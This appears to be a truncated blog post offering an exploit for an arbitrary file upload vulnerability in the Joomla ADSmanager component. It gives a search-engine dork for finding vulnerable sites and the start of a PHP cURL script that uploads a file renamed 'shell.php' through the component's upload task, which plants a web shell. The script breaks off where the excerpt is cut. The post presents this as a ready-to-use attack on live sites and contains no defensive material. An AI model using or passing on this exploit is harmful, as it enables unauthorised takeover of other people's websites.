Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability

Joomla ADSmanager Exploit Arbitrary File Upload Vulnerability   Dork : inurl:/index.php?option=com_adsmanager/ site:/uk/com/org CODE PHP : <?php $url = “blabla.com/index.php?option=com_adsmanager&task=upload&tmpl=component”; // put URL Here $post = array ( “file” => “@shell.jpg”, “name” => “shell.php” ); $ch = curl_init (“$url“); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1); curl_setopt ($ch, CURLOPT_USERAGENT, “Mozilla/5.0[…] Continue reading

Plz Share Share on FacebookShare on Google+Share on LinkedInTweet about this on TwitterEmail this to someoneShare on RedditShare on TumblrDigg thisBuffer this pagePrint this pagePin on PinterestShare on StumbleUponFlattr the author